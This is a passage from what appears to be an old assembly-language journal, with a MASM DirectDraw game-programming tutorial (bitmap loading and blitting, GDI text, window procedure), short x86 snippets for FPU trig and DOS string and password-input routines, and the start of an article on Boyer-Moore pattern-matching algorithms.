         .IF app_bpp == 16
                 .IF pRed == 10
                         MOV     Is_555, TRUE
                 .ELSE
                         MOV     Is_555, FALSE
                 .ENDIF
         .ENDIF

done:
         ;===================
         ; We completed
         ;===================
         return TRUE

DD_Get_RGB_Format ENDP
;########################################################################
; END DD_Get_RGB_Format
;########################################################################


First, we initialize our description structure and make a call to get the
surface description from Direct Draw. We place the masks that are returned
in
global variables, since we will want to use them in all kinds of places. A
mask
is a value that you can use to set or clear certain bits in a
variable/register. In our case, we use them to mask off the unnecessary bits
so
that we can access the red, green, or blue bits of our pixel individually.

The next three sections of code are used to determine the number of bits in
each color component. For example, if we had set the mode to 24 bpp, then
there
would be 8-bits in every component. The way we determine the number of bits
it
needs to be moved is by shifting each mask to the right by 1 and AND'ing it
with the number one. This allows us to effectively count all the bits we
need
to shift by in order to move our component into its proper position. This
works
because the mask is going to contain a 1 where the bits are valid. So, by
AND'ing it with the 1 we are able to see if the bit was turned on or not,
since
the number one will leave only the first bit set and turn all others off.

Finally, we set a variable that tells us whether or not the video mode is
5-5-5
or 5-6-5. This is extremely important since 16 bpp mode can be either, and
we
do not want our pictures to have a green or purple tint on one machine, and
look fine on another one!

The last function that I want to cover in our Direct Draw library is the
text
drawing function. This uses GDI and so I figured I should at least give it a
small explanation. The code ...


;########################################################################
; DD_Draw_Text Procedure
;########################################################################
DD_Draw_Text    PROC    surface:DWORD, text:DWORD, num_chars:DWORD,
                                 x:DWORD, y:DWORD, color:DWORD

         ;=======================================================
         ; This function will draw the passed text on the passed
         ; surface using the passed color at the passed coords
         ; with GDI
         ;=======================================================

         ;===========================================
         ; First we need to get a DC for the surface
         ;===========================================
         DDS4INVOKE GetDC, surface, ADDR hDC

         ;===========================================
         ; Set the text color and BK mode
         ;===========================================
         INVOKE SetTextColor, hDC, color
         INVOKE SetBkMode, hDC, TRANSPARENT

         ;===========================================
         ; Write out the text at the desired location
         ;===========================================
         INVOKE TextOut, hDC, x, y, text, num_chars

         ;===========================================
         ; release the DC we obtained
         ;===========================================
         DDS4INVOKE ReleaseDC, surface, hDC

done:
         ;===================
         ; We completed
         ;===================
         return TRUE

DD_Draw_Text ENDP
;########################################################################
; END DD_Draw_Text
;########################################################################


Following this code is relatively simple. First, we get the Device Context
for
our surface. In Windows, drawing is typically done through these DC's (
Device
Contexts ), thus ... if you want to use any GDI function in Direct Draw the
first thing you have to do is get the DC for your surface. Then, we set the
background mode and text color using basic Windows GDI calls. Now, we are
ready
to draw our text ... again we just make a call to the Windows function
TextOut(). There are many others, this is just the one that I chose to use.
Finally, we release the DC for our surface.

The rest of the Direct Draw routines follow the same basic format and use
the
same types of calls, so they shouldn't be too hard to figure out. The basic
idea behind all of the routines is the same: encapsulate the functionality
we
need into some services that still allow us to be flexible. Now, we need to
write the code to handle our bitmaps that go into these surfaces.


Our Bitmap Library
------------------
We are now ready to write our bitmap library. We will start like the Direct
Draw library by determining what we need. As far as I can tell right now, we
should be good with two simple routines: a bitmap loader, and a draw
routine.
Since we will be using surfaces, the draw routine should draw onto the
passed
surface. Our loader will load our special file format which I will cover in
a
moment. That should be it, there isn't that much that is needed for bitmaps
nowadays. DirectX is how most manipulation occurs, especially since many
things
can be done in hardware. With that in mind we will cover our unique file
format.

Normally, creating your own file format is a headache and isn't worth the
trouble. However, in our case it greatly simplifies the code and I have
provided the conversion utility with the download package. This format is
probably one of the easiest you will ever encounter. It has five main parts:
Width, Height, BPP, Size of Buffer, and Buffer. The first three give
information on the image. I have our library setup for 16 bpp only but
implementing other bit depths would be fairly easy. The fourth section tells
us
how large of a buffer we need for the image, and the fifth section is that
buffer. Having our own format not only makes the code we need to write a lot
easier, it also prevents other people from seeing our work before they were
meant to see it! Now, how do we load this bad boy?


;########################################################################
; Create_From_SFP Procedure
;########################################################################
Create_From_SFP PROC    ptr_BMP:DWORD, sfp_file:DWORD, desired_bpp:DWORD

         ;=========================================================
         ; This function will allocate our bitmap structure and
         ; will load the bitmap from an SFP file. Converting if
         ; it is needed based on the passed value.
         ;=========================================================

         ;=================================
         ; Local Variables
         ;=================================
         LOCAL hFile     :DWORD
         LOCAL hSFP      :DWORD
         LOCAL Img_Left  :DWORD
         LOCAL Img_Alias :DWORD
         LOCAL red       :DWORD
         LOCAL green     :DWORD
         LOCAL blue      :DWORD
         LOCAL Dest_Alias :DWORD

         ;=================================
         ; Create the SFP file
         ;=================================
         INVOKE CreateFile, sfp_file, GENERIC_READ,FILE_SHARE_READ, \
                 NULL,OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL,NULL
         MOV     hFile, EAX

         ;===============================
         ; Test for an error
         ;===============================
         .IF EAX == INVALID_HANDLE_VALUE
                 JMP err
         .ENDIF

         ;===============================
         ; Get the file size
         ;===============================
         INVOKE GetFileSize, hFile, NULL
         PUSH    EAX

         ;================================
         ; test for an error
         ;================================
         .IF EAX == -1
                 JMP err
         .ENDIF

         ;==============================================
         ; Allocate enough memeory to hold the file
         ;==============================================
         INVOKE GlobalAlloc, GMEM_FIXED, EAX
         MOV     hSFP, EAX

         ;===================================
         ; test for an error
         ;===================================
         .IF EAX == 0
                 JMP err
         .ENDIF

         ;===================================
         ; Put the file into memory
         ;===================================
         POP     EAX
         INVOKE ReadFile, hFile, hSFP, EAX, OFFSET Amount_Read, NULL

         ;====================================
         ; Test for an error
         ;====================================
         .IF EAX == FALSE
                 ;========================
                 ; We failed so leave
                 ;========================
                 JMP err

         .ENDIF

         ;===================================
         ; Determine the size without the BPP
         ;===================================
         MOV     EBX, hSFP
         MOV     EAX, DWORD PTR [EBX]
         ADD     EBX, 4
         MOV     ECX, DWORD PTR [EBX]
         MUL     ECX
         PUSH    EAX

         ;======================================
         ; Do we allocate a 16 or 24 bit buffer
         ;======================================
         .IF desired_bpp == 16
                 ;============================
                 ; Just allocate a 16-bit
                 ;============================
                 POP     EAX
                 SHL     EAX, 1
                 INVOKE GlobalAlloc, GMEM_FIXED, EAX
                 MOV     EBX, ptr_BMP
                 MOV     DWORD PTR [EBX], EAX
                 MOV     Dest_Alias, EAX

                 ;====================================
                 ; Test for an error
                 ;====================================
                 .IF EAX == FALSE
                         ;========================
                         ; We failed so leave
                         ;========================
                         JMP err

                 .ENDIF

         .ELSE
                 ;========================================
                 ; This is where code for 24 bit would go
                 ;========================================

                 ;============================
                 ; For now just return an err
                 ;============================
                 JMP err

         .ENDIF

         ;====================================
         ; Setup for reading in
         ;====================================
         MOV     EBX, hSFP
         ADD     EBX, 10
         MOV     EAX, DWORD PTR[EBX]
         MOV     Img_Left, EAX
         ADD     EBX, 4
         MOV     Img_Alias, EBX

         ;====================================
         ; Now lets start converting values
         ;====================================
         .WHILE Img_Left > 0
                 ;==================================
                 ; Build a color word based on
                 ; the desired BPP or transfer
                 ;==================================
                 .IF desired_bpp == 16
                         ;==========================================
                         ; Read in a byte for blue, green and red
                         ;==========================================
                         XOR     ECX, ECX
                         MOV     EBX, Img_Alias
                         MOV     CL, BYTE PTR [EBX]
                         MOV     blue, ECX
                         INC     EBX
                         MOV     CL, BYTE PTR [EBX]
                         MOV     green, ECX
                         INC     EBX
                         MOV     CL, BYTE PTR [EBX]
                         MOV     red, ECX

                         ;=======================
                         ; Adjust the Img_Alias
                         ;=======================
                         ADD     Img_Alias, 3

                         ;================================
                         ; Do we build a 555 or a 565 val
                         ;================================
                         .IF Is_555 == TRUE
                                 ;============================
                                 ; Build the 555 color word
                                 ;============================
                                 RGB16BIT_555 red, green, blue
                         .ELSE
                                 ;============================
                                 ; Build the 565 color word
                                 ;============================
                                 RGB16BIT_565 red, green, blue

                         .ENDIF

                         ;================================
                         ; Transer it to the final buffer
                         ;================================
                         MOV     EBX, Dest_Alias
                         MOV     WORD PTR [EBX], AX

                         ;============================
                         ; Adjust the dest by 2
                         ;============================
                         ADD     Dest_Alias, 2

                 .ELSE
                         ;========================================
                         ; This is where code for 24 bit would go
                         ;========================================

                         ;============================
                         ; For now just return an err
                         ;============================
                         JMP err

                 .ENDIF

                 ;=====================
                 ; Sub amount left by 3
                 ;=====================
                 SUB     Img_Left, 3

         .ENDW

         ;====================================
         ; Free the SFP Memory
         ;====================================
         INVOKE GlobalFree, hSFP

done:
         ;===================
         ; We completed
         ;===================
         return TRUE

err:
         ;====================================
         ; Free the SFP Memory
         ;====================================
         INVOKE GlobalFree, hSFP

         ;===================
         ; We didn't make it
         ;===================
         return FALSE

Create_From_SFP ENDP
;########################################################################
; END Create_From_SFP
;########################################################################


The code starts out by creating the file, which, in Windows, is how you open
it, and then retrieves the file size. This allows us to allocate enough
memory
to load our entire file in. The process of reading in the file is fairly
simple
we just make a call. As usual the most important parts are those that check
for
errors.

Once the file is in memory we compute the size of the desired image based
upon
the width and height in our header, and the "desired_bpp" level that was
passed
in to the function. Then we allocate yet another buffer with the information
we
calculated. This is the buffer that is kept in the end.

The next step is the heart of our load function. Here we read in 3 bytes,
since
our pictures are stored as 24-bit images, and create the proper color value
( 5-6-5 or 5-5-5 ) for the buffer. We then store that value in the new
buffer
that we just created. We loop through all pixels in our bitmap and convert
each
to the desired format. The conversion is based on a pre-defined macro. You
could also implement the function by using the members we filled, when we
called the function to get the pixel format. This second way would allow you
to
have a more abstract interface to the code ... but for our purposes it was
better to see what was really happening to the bits.

At the completion of our loop we free the main buffer and return the address
of
the buffer with our converted pixel values. If an error occurs at any point,
we
jump to our error code which frees the possible buffer we could have
created.
This is to prevent memory leaks. And ... that is it for the load function.

Once the bitmap is loaded into memory we need to be able to draw it onto a
Direct Draw surface. Whether we are loading it in there permanently, or just
drawing a quick picture onto the back buffer should not matter. So, we will
look at a function that draws the passed bitmap onto our passed surface.
Here
is the code:


;########################################################################
; Draw_Bitmap Procedure
;########################################################################
Draw_Bitmap PROC surface:DWORD, bmp_buffer:DWORD, lPitch:DWORD, bpp:DWORD

         ;=========================================================
         ; This function will draw the BMP on the surface.
         ; the surface must be locked before the call.
         ;
         ; It uses the width and height of the screen to do so.
         ; I hardcoded this in just 'cause ... okay.
         ;
         ; This routine does not do transparency!
         ;=========================================================

         ;===========================
         ; Local Variables
         ;===========================
         LOCAL dest_addr :DWORD
         LOCAL source_addr :DWORD

         ;===========================
         ; Init the addresses
         ;===========================
         MOV     EAX, surface
         MOV     EBX, bmp_buffer
         MOV     dest_addr, EAX
         MOV     source_addr, EBX

         ;===========================
         ; Init counter with height
         ;
         ; Hard-coded in.
         ;===========================
         MOV     EDX, 480

         ;=================================
         ; We are in 16 bit mode
         ;=================================

copy_loop1:
         ;=============================
         ; Setup num of bytes in width
         ;
         ; Hard-coded also.
         ;
         ; 640*2/4 = 320.
         ;=============================
         MOV     ECX, 320

         ;=============================
         ; Set source and dest
         ;=============================
         MOV     EDI, dest_addr
         MOV     ESI, source_addr

         ;======================================
         ; Move by DWORDS
         ;======================================
         REP movsd

         ;==============================
         ; Adjust the variables
         ;==============================
         MOV     EAX, lPitch
         MOV     EBX, 1280
         ADD     dest_addr, EAX
         ADD     source_addr, EBX

         ;========================
         ; Dec the line counter
         ;========================
         DEC     EDX

         ;========================
         ; Did we hit bottom?
         ;========================
         JNE copy_loop1


done:
         ;===================
         ; We completed
         ;===================
         return TRUE

err:
         ;===================
         ; We didn't make it
         ;===================
         return FALSE

Draw_Bitmap ENDP
;########################################################################
; END Draw_Bitmap
;########################################################################


This function is a little bit more advanced than some of the others we have
seen, so pay attention. We know, as assembly programmers, that if we can get
everything into a register things will be faster than if we had to access
memory. So, in that spirit, we place the starting source and destination
addresses into registers.

Then, we compute the number of WORDS in our line. We can then divide this
number by 2, so that we have the number of DWORDS in a line. I have
hard-coded
this number in since we will always be in 640 x 480 x 16 for our game. Once
we
have this number we place it in the register ECX. The reason for this is our
next instruction MOVSD can be combined with the REP label. This will move a
DWORD, decrement ECX by 1, compare ECX to ZERO if not equal then MOVE A
DWORD,
etc. until ECX is equal to zero. In short it is like having a For loop with
the counter in ECX. As we have the code right now, it is moving a DWORD from
the source into the destination until we have exhausted the number of DWORDS
in
our line. At which point it does this over again until we have reached the
number of lines in our height ( 480 in our case ).

Those are our only two functions in the bitmap module. They are short and
sweet. More importantly, now that we have our bitmap and Direct Draw
routines
coded we can write the code to display our loading game screen!


A Game ... Well, Kinda'
-----------------------
The library routines are complete and we are now ready to plunge into our
game
code. We will start out by looking at the game initialization function since
it
is called first in our code.


;########################################################################
; Game_Init Procedure
;########################################################################
Game_Init PROC

         ;=========================================================
         ; This function will setup the game
         ;=========================================================

         ;============================================
         ; Initialize Direct Draw -- 640, 480, bpp
         ;============================================
         INVOKE DD_Init, 640, 480, screen_bpp

         ;====================================
         ; Test for an error
         ;====================================
         .IF EAX == FALSE
                 ;========================
                 ; We failed so leave
                 ;========================
                 JMP err

         .ENDIF

         ;======================================
         ; Read in the bitmap and create buffer
         ;======================================
         INVOKE Create_From_SFP, ADDR ptr_BMP_LOAD, ADDR szLoading,
screen_bpp

         ;====================================
         ; Test for an error
         ;====================================
         .IF EAX == FALSE
                 ;========================
                 ; We failed so leave
                 ;========================
                 JMP err

         .ENDIF

         ;===================================
         ; Lock the DirectDraw back buffer
         ;===================================
         INVOKE DD_Lock_Surface, lpddsback, ADDR lPitch

         ;============================
         ; Check for an error
         ;============================
         .IF EAX == FALSE
                 ;===================
                 ; Jump to err
                 ;===================
                 JMP err

         .ENDIF

         ;===================================
         ; Draw the bitmap onto the surface
         ;===================================
         INVOKE Draw_Bitmap, EAX, ptr_BMP_LOAD, lPitch, screen_bpp

         ;===================================
         ; Unlock the back buffer
         ;===================================
         INVOKE DD_Unlock_Surface, lpddsback

         ;============================
         ; Check for an error
         ;============================
         .IF EAX == FALSE
                 ;===================
                 ; Jump to err
                 ;===================
                 JMP err

         .ENDIF

         ;=====================================
         ; Everything okay so flip displayed
         ; surfaces and make loading visible
         ;======================================
         INVOKE DD_Flip

         ;============================
         ; Check for an error
         ;============================
         .IF EAX == FALSE
                 ;===================
                 ; Jump to err
                 ;===================
                 JMP err

         .ENDIF

done:
         ;===================
         ; We completed
         ;===================
         return TRUE

err:
         ;===================
         ; We didn't make it
         ;===================
         return FALSE

Game_Init ENDP
;########################################################################
; END Game_Init
;########################################################################


This function plays the most important part in our game so far. In this
routine
we make the call to initialize Direct Draw. If this succeeds we load in our
"Loading Game " bitmap file from disk. After that we lock the back buffer.
This
is very important to do since we will be accessing the memory directly.
After
it is locked we can draw our bitmap onto the surface and then unlock it. The
final call in our procedure is to flip the buffers. Since we have the bitmap
on
the back buffer, we need it to be visible. Therefore, we exchange the
buffers.
The front goes to the back and the back goes to the front. At the completion
of
this call our bitmap is now visible on screen. One thing that may be
confusing
here is why we didn't load the bitmap into a Direct Draw surface. The reason
is
we will only be using it once so there was no need to waste a surface.

Next on our list of things to code is the Windows callback function itself.
This function is how we handle messages in Windows. Anytime we want to
handle a
message the code will go in this function. Take a look at how we have it
setup
currently.


;########################################################################
; Main Window Callback Procedure -- WndProc
;########################################################################
WndProc PROC hWin       :DWORD,
                 uMsg    :DWORD,
                 wParam  :DWORD,
                 lParam  :DWORD

.IF uMsg == WM_COMMAND
         ;===========================
         ; We don't have a menu, but
         ; if we did this is where it
         ; would go!
         ;===========================

.ELSEIF uMsg == WM_KEYDOWN
         ;=======================================
         ; Since we don't have a Direct input
         ; system coded yet we will just check
         ; for escape to be pressed
         ;=======================================
         MOV     EAX, wParam
         .IF EAX == VK_ESCAPE
                 ;===========================
                 ; Kill the application
                 ;===========================
                 INVOKE PostQuitMessage,NULL

         .ENDIF

         ;==========================
         ; We processed it
         ;==========================
         return 0

.ELSEIF uMsg == WM_DESTROY
         ;===========================
         ; Kill the application
         ;===========================
         INVOKE PostQuitMessage,NULL
          return 0

.ENDIF

;=================================================
; Let the default procedure handle the message
;=================================================
INVOKE DefWindowProc,hWin,uMsg,wParam,lParam

RET

WndProc endp
;########################################################################
; End of Main Windows Callback Procedure
;########################################################################


The code is fairly self-explanatory. So far we only deal with 2 messages the
WM_KEYDOWN message and the WM_DESTROY message. We process the WM_KEYDOWN
message so that the user can hit escape and exit our game. We will be coding
a
Direct Input system, but until then we needed a way to quit the game! The
one
thing you should notice is that any messages we do not deal with are handled
by
the "default" processing function -- DefWindowProc(). This function is
defined
by Windows already. You just need to call it whenever you do not handle a
message.

The game main function we aren't going to look at, simply because it is
empty.
We haven't added any solid code to our game loop yet. But, everything is
prepared so that next time we can get to it. That then leaves us with the
shutdown code.


;########################################################################
; Game_Shutdown Procedure
;########################################################################
Game_Shutdown PROC

         ;============================================================
         ; This shuts our game down and frees memory we allocated
         ;============================================================

         ;===========================
         ; Shutdown DirectDraw
         ;===========================
         INVOKE DD_ShutDown

         ;==========================
         ; Free the bitmap memory
         ;==========================
         INVOKE GlobalFree, ptr_BMP_LOAD

done:
         ;===================
         ; We completed
         ;===================
         return TRUE

err:
         ;===================
         ; We didn't make it
         ;===================
         return FALSE

Game_Shutdown ENDP
;########################################################################
; END Game_Shutdown
;########################################################################


Here we make the call to shutdown our Direct Draw library, and we also free
the
memory we allocated earlier for the bitmap. We could have freed the memory
elsewhere and maybe next issue we will. But, things are a bit easier to
understand when all of your initialization and cleanup code is in one place.

As you can see there isn't that much code in our game specific stuff. The
majority resides in our modules, such as Direct Draw. This allows us to keep
our code clean and any changes we may need to make later on a much easier
since
things aren't hard-coded inline. Anyway, the end result of what you have
just
seen is a Loading screen that is displayed until the user hits the escape
key.
And that ... primitive though it may be ... is our game thus far.


Until Next Time ...
-------------------
We covered a lot of material in this article. We now have a bitmap library,
and
a Direct Draw library for our game. These are core modules that you should
be
able to use in any game. By breaking up the code like this we are able to
keep
our game code separate from the library code. You do not want any module to
be
dependent on another module.

In the next article we will be continuing our module development with Direct
Input. We will also be creating our menu system next time. These two things
should keep us busy. So, that is what you have to look forward to in the
next
installment.

Once again young grasshoppers, until next time ... happy coding.

Get the complete source for the game here:

    http://asmjournal.freeservers.com/files/game2.zip



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::................................ASSEMBLY.LANGUAGE.SNIPPETS
                                                    Basic trigonometry
functions
                                                    by Eoin O'Callaghan

;Summary:       Basic trigonometry functions not directly supported on the
FPU
;               (ArcCos, ArcSin, HSin, HCos and HTan).
;Compatibility: Floating-Point Unit.
;Notes:         None.

.data
         hPi dt 3FFFC90FDAA22168C235h ; tbyte
         iL2e dt 3FFEB17217F7D1CF79ACh ; tbyte
         half dd 0.5

ArcCos MACRO ;Inverse Cosine, st(0) = arccos(st(0))
         fld1
         fld st(1)
         fmul st,st
         fsub
         fsqrt
         fpatan
         fchs
         fld hPi
         fadd
EndM

ArcSin Macro ;Inverse Sine, st(0) = arcsin(st(0))
         fld1
         fld st(1)
         fmul st,st
         fsub
         fsqrt
         fpatan
EndM

HSin Macro ;Hyperbolic Sin, st(0) = hsin(st(0)
         fldl2e
         fmul
         fld st
         frndint
         fsub st(1),st
         fld1
         fscale
         fxch
         fstp st
         fxch
         f2xm1
         fld1
         fadd
         fmul

         fld st
         fld1
         fdivr
         fsub
         fmul half
EndM

HCos Macro ;Hyperbolic Cos, st(0) = hcos(st(0)
         fldl2e
         fmul
         fld st
         frndint
         fsub st(1),st
         fld1
         fscale
         fxch
         fstp st
         fxch
         f2xm1
         fld1
         fadd
         fmul

         fld st
         fld1
         fdivr
         fadd
         fmul half
EndM

HTan Macro ;Hyperbolic Tan, st(0) = htan(st(0)
         fldl2e
         fmul
         fld st
         frndint
         fsub st(1),st
         fld1
         fscale
         fxch
         fstp st
         fxch
         f2xm1
         fld1
         fadd
         fmul

         fmul st,st
         fld st
         fld1
         fadd
         fxch
         fld1
         fsub
         fdivr
EndM


                                                                    getpass
                                                                    by Jake
Bush

;Summary:       Get a password type input.
;Compatibility: x86
;Notes:         input:
;                  BX    = Max length to save.
;                  ES:DI = Location to save the input. (Size must be at
least
;                          BX + 1).
;               output:
;                  none.

getpass:
         pusha
         xor    cx, cx
.1:     xor    ah, ah
         int    16h
         cmp    al, 0dh
         je    .4
         cmp    cx, 0h
         je    .2
         cmp    al, 8h
         je    .3
.2:     cmp    cx, bx
         je    .1
         cmp    al, 20h
         jb    .1
         stosb
         pusha
         mov    al, '*'
         mov    ah, 0eh
         xor    bh, bh
         mov    cx, 1h
         int    10h
         popa
         inc    cx
         jmp    .1
.3:     dec    di
         dec    cx
         pusha
         mov    al, 8h
         mov    ah, 0eh
         xor    bh, bh
         mov    cx, 1h
         int    10h
         mov    al, ' '
         int    10h
         mov    al, 8h
         int    10h
         popa
         jmp    .1
.4:     mov    al, 0h
         stosb
         popa
         ret


                                                                    strcmp
                                                                    by Jake
Bush

;Summary:       Compares two strings.
;Compatibility: x86
;Notes:         input:
;                  DS:SI = String 1.
;                  ES:DI = String 2.
;               output:
;                  CF    = 0 = Equal
;                          1 = Unequal

strcmp:
         pusha
.1:     mov    al, [ds:si]
         mov    ah, [es:di]
         cmp    ah, al
         jne    .2
         cmp    ax, 0h
         je    .3
         inc    si
         inc    di
         jmp    .1
.2:     stc
         jmp    .4
.3:     clc
.4:     popa
         ret


                                                                    strlwr
                                                                    by Jake
Bush

;Summary:       Converts all the characters in a ASCIIz string to
lower-case.
;Compatibility: x86
;Notes:         input:
;                  DS:SI = Location of an string to convert.
;                  ES:DI = Location to save the converted string.
;               output:
;                  none.

strlwr:
         pusha
.1:     lodsb
         cmp    al, 0h
         je    .3
         cmp    al, 41h
         jb    .2
         cmp    al, 90h
         ja    .2
         or    al, 00100000b
.2:     stosb
         jmp    .1
.3:     popa
         ret


                                                                    strupr
                                                                    by Jake
Bush

;Summary:       Converts all the characters in a ASCIIz string to
upper-case.
;Compatibility: x86
;Notes:         input:
;                  DS:SI = Location of an string to convert.
;                  ES:DI = Location to save the converted string.
;               output:
;                  none.

strupr:
         pusha
.1:     lodsb
         cmp    al, 0h
         je    .3
         cmp    al, 61h
         jb    .2
         cmp    al, 7ah
         ja    .2
         xor    al, 00100000b
.2:     stosb
         jmp    .1
.3:     popa
         ret



::/ \::::::.
:/___\:::::::.
/|    \::::::::.
:|   _/\:::::::::.
:| _|\  \::::::::::.
:::\_____\:::::::::::...........................................ISSUE.CHALLENGE


Challenge
---------
Code a fast pattern matching algorithm.


Solution
--------
Four approaches are presented here, three by Steve Hutchesson, who also
wrote a
very good introductory text explaining the foundation of the Boyer Moore
search
algorithm and its variations, and one by buliaNaza who aims at writing the
fastest binary string search algorithm for PPlain and PMMX processors.


                             Three Boyer Moore Exact Pattern Matching
Algorithms
                             by Steve Hutchesson


Three Boyer Moore Exact Pattern Matching Algorithms
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Steve Hutchesson
Sydney
Australia
August 2001
hutch@...

In 1977 Robert Boyer and L. Moore designed an exact pattern matching
algorithm that was different from any of the contemporary designs of the
time. It had a fundamentally different logic that compared the pattern
being searched for to the current location in the source in reverse order.

The logic was based on obtaining more information from performing the
comparison in reverse than the standard methods of forward comparison. If a
character that caused the mismatch was not among the characters that were
in the pattern being matched, there was no point in matching any further
characters so the pattern could be shifted right by the number of
characters needed to go past it.

This shift has usually been called the BAD CHARACTER shift.

               |
source  : bad character shift
pattern : shift
               |

Character "t" mismatches with character "c" in the source. "c" is not in
the pattern being searched for and there is no point in searching further
back as no match is possible at the current location so the pattern is
shifted the number of places right so that the pattern is completely past
the mismatching character.

                    |
source  : bad character shift
pattern :      shift
                    |

Character "t" again mismatches with character "c" in the source so the
pattern is again shifted completely past the mismatching character.

                         |
source  : bad character shift
pattern :           shift
                         |

The next mismatch is different to the previous ones, it is with a character
that is within the pattern being searched for and this requires a different
type of shift. When a character is within the pattern, it allows the
capacity to start matching the pattern to the source. This shift is usually
called the GOOD SUFFIX shift but it is sometimes called the MATCHING SHIFT.

The fundamental Boyer Moore design uses a clever method of determining if
the character being compared is within the pattern being searched for or
not. It constructs a table of 256 members which is initially filled with
the length of the pattern being searched for in the source. It then
overwrites the position of each character in the pattern into the table at
the correct position for the character's ascii value.

This means that a character being compared can be tested in one memory read
to determine if it is within the pattern or not, if the shift in the table
is the same length as the pattern, the character is not in the pattern, if
it is less, it is a character that is in the pattern.

This will produce a set of shifts for the character in the pattern that
descend in their value.

pattern : shift
           4321      <- GOOD SUFFIX shift
           12345     <- BAD CHARACTER shift

The method of calculating the BAD CHARACTER shift is based on the ascending
count from the beginning of the pattern. If it is the first character being
compared, the shift is the length of the pattern, for each comparison made,
the shift decrements by one.

Apply the GOOD SUFFIX shift from the table and the pattern is shifted
across so that the character "s" lines up with the "s" in the source and
the pattern has been matched.

                             *
source  : bad character shift
pattern :               shift
                             *

This example works OK because the mismatch occurs on the first comparison
but in patterns that have repeat sequences of characters, this matching by
itself will often fail to produce a match.

pattern : foooooo
           711111    <- GOOD SUFFIX shift
           1234567   <- BAD CHARACTER shift

The sequence of "1" in the GOOD SUFFIX shift is caused by the overwriting
of the location for the character "o" in the table for each of its
occurrences. The normal method is to subtract the BAD CHARACTER shift from
the GOOD SUFFIX shift if the mismatch is not the first at the current
location in the source. This can produce a value less than 1 so a minimum
shift of 1 is applied if this happens.

Coding Considerations
~~~~~~~~~~~~~~~~~~~~~
Much of the available technical data on exact pattern matching is written
in ANSI C and it tends to carry the set of assumptions related to the
capacity of that language. The "holy grail" of exact pattern matching is to
perform as few comparisons as necessary to obtain the match if it exists.
This is usually called "sublinearity" and it means comparing less
characters that a traditional forward BYTE scanner.

The problem with this approach is that if the overhead to produce the
"sublinearity" is too large, the algorithm is slower than a BYTE scanner so
considerations of theoretical design must be tempered with what is possible
with good coding practice to deliver the desired speed.

The BAD CHARACTER shift has often been coded in high level languages as
another table but it is a very inefficient way to code the shift as the
loop counter in the main comparison loop holds the same value and it can be
accessed a lot faster than a member of a table in memory.

The three version presented below use an Intel specific optimisation
related to preventing a register stall by reading and comparing a byte in
AL and subsequently using the EAX register in the table location
calculation. XOR EAX, EAX or SUB EAX, EAX both zero the register and the
stall does not occur. This makes the code slightly slower on AMD hardware
but not by very much.

There is an additional heuristic in the original Boyer Moore algorithm that
has not been implemented, when a BAD CHARACTER shift has been determined,
the heuristic requires that the larger of the two shifts should be applied.
In practice the two extra instructions to perform this comparison reduce
the speed of the algorithm by about 5%.

Where a GOOD SUFFIX shift is required that is the first mismatch at the
current location, the calculation that subtracts the BAD CHARACTER shift is
not required so a seperate loop has been included to save this extra two
instructions. The speed increase is about 5% for doing so.

Processor Variation
~~~~~~~~~~~~~~~~~~~
Testing shows that there is measurable differences between later Intel
processors and later AMD processors. The AMD has a shorter pipeline and a
lower penalty for register stalls where the Intel processors have better
branch prediction and a lower penalty for mispredicted jumps. The GOOD
SUFFIX shift favours the AMD processors where the BAD CHARACTER shift works
better on the Intel processors.

Three variations are implemented that utilise the different shifts, the
original BM algorithm uses both shifts, a variation that is similar to a
Horspool variation uses only the BAD CHARACTER shift and another variation
only uses the GOOD SUFFIX shift.

Algorithm Variations
~~~~~~~~~~~~~~~~~~~~
The original BM algorithm has a slightly higher overhead than the two
variations but it generally produces a larger shift and this has the effect
that it is more consistent across both processor types with different
patterns and different pattern lengths. This is because it it more
dependent on logic that fast loop code.

The Horspool variation perfoms well on Intel hardware and is well suited for
plain text search in things like text editors and word processors but it is
sensitive to patterns that have a high frequency of characters in the source
being searched. Its advantage is small loop code in the searching phase. In
this implementation, it does the comparison in reverse order as this method
produces the BAD CHARACTER shift in the most efficient manner.

The second variation uses only the GOOD SUFFIX shift and generally performs
well on older Intel hardware and later AMD machines. It has the advantage of
fast loop code but by only using one of the available shifts, its average
shift
length is shorter than the original algorithm. It uses the same bypass for
the
first mismatch that the original BM algo has.

Limitations
~~~~~~~~~~~
The pattern length threshold for improving on a forward byte scanner appears
to
be about 6 characters. Below this a BYTE scanner is faster. A BM type
algorithm
has about a 300 character penalty in the time it takes to construct the
table
and this must be kept in mind if the task requires recursively searching
short
sources for short patterns.

A slightly more subtle consideration is what is called "mismatch recovery".
Boyer Moore algorithms have normally been sensitive to the frequency of end
characters in the pattern and this is easy to demonstrate when searching
plain
text when the pattern has a trailing blank space in it. EXAMPLE : "pattern "

The solution is to code the comparison loop with a very short instruction
path
and while this does not particularly increase the absolute forward scanning
speed of the algorithm type, it does improve its recovery from repeated
mismatches.

The three algorithms presented below have very good mismatch recovery which
is
related to their very short comparison loops instruction paths.

The three algorithms have been tested on Intel Celeron, PII and PIII
machines
and AMD K6-2, Duron and Athlon machines. They have been optimised to run on
both types without specifically targetting one particular model. Slight
speed
increases can be obtained by coding specifically for one particular model
but usually at the expense of most other processors.

The parameters for the 3 procedures.

startpos    zero based offset to start searching in the source
lpSource    the address of the source to search
srcLngth    the length of the source
lpSubStr    the address of the pattern to search for
subLngth    the length of the pattern

                 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
                 @                                     @
                 @   The basic Boyer Moore algorithm   @
                 @                                     @
                 @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

; #########################################################################

     .486
     .model flat, stdcall  ; 32 bit memory model
     option casemap :none  ; case sensitive

     .code

; #########################################################################

BMBinSearch proc startpos:DWORD,
                  lpSource:DWORD,srcLngth:DWORD,
                  lpSubStr:DWORD,subLngth:DWORD

     LOCAL cval   :DWORD
     LOCAL shift_table[256]:DWORD

     push ebx
     push esi
     push edi

     mov ebx, subLngth

     cmp ebx, 1
     jg @F
     mov eax, -2                 ; string too short, must be > 1
     jmp Cleanup
   @@:

     mov esi, lpSource
     add esi, srcLngth
     sub esi, ebx
     mov edx, esi            ; set Exit Length

   ; ----------------------------------------
   ; load shift table with value in subLngth
   ; ----------------------------------------
     mov ecx, 256
     mov eax, ebx
     lea edi, shift_table
     rep stosd

   ; ----------------------------------------------
   ; load decending count values into shift table
